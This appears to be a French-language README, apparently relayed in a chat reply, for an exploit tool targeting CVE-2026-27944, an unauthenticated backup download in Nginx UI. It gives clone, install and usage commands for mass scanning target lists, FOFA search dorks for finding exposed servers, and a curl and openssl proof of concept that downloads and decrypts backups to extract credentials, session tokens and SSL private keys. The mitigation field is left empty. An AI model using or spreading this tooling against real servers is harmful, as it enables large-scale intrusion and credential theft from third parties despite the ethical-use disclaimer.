
Comme tu veux
🚀 CVE-2026-27944: Exploitation de sauvegarde non authentifiée de Nginx UI
📌 Description
27944.py est un outil d'exploitation pour CVE-2026-27944 qui permet à un attaquant de télécharger et décrypter la sauvegarde de Nginx UI sans authentification.
Cette vulnérabilité se trouve dans Nginx UI version < 2.3.2 et permet d'accéder à :
· Identifiants utilisateur et tokens de session · Clés privées SSL · Configuration Nginx · Fichiers de base de données
🔧 Fonctionnalités
· ✅ Scan massif à partir d'un fichier de cibles · ✅ Exploit sur cible unique · ✅ Téléchargement automatique de la sauvegarde · ✅ Déchiffrement automatique AES-256-CBC · ✅ Extraction automatique des identifiants depuis la sauvegarde
🛠️ Installation
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt
🚀 Utilisation
python 27944.py -f targets.txt -o hasil_scan
python 27944.py -t target.com:9000 --exploit --decrypt
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full
📋 Format des cibles
target1.com:9000
192.168.1.1:9000
target2.com:8080
🎯 Dork FOFA
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"
📂 Résultat de sortie
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
├── app.ini
├── database.db
├── nginx.conf
└── ssl/
⚠️ Avertissement
Cet outil a été créé à des fins éducatives et de test de sécurité éthique. L'auteur n'est pas responsable de l'utilisation abusive de cet outil. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite de tester.
📝 Explication technique
CVE-2026-27944 est une vulnérabilité critique dans Nginx UI qui permet à un attaquant d'accéder au point de terminaison /api/backup sans authentification. La sauvegarde contient des données sensibles chiffrées avec AES-256, mais la clé et l'IV sont envoyés via l'en-tête X-Backup-Security au format Base64.
Score CVSS : 9.8 (Critique)
Version affectée : Nginx UI < 2.3.2
Mitigation :
💀 POC
# Cek vulnerability
curl -I http://target:9000/api/backup
# Download backup
curl -s http://target:9000/api/backup -o backup.bin
# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip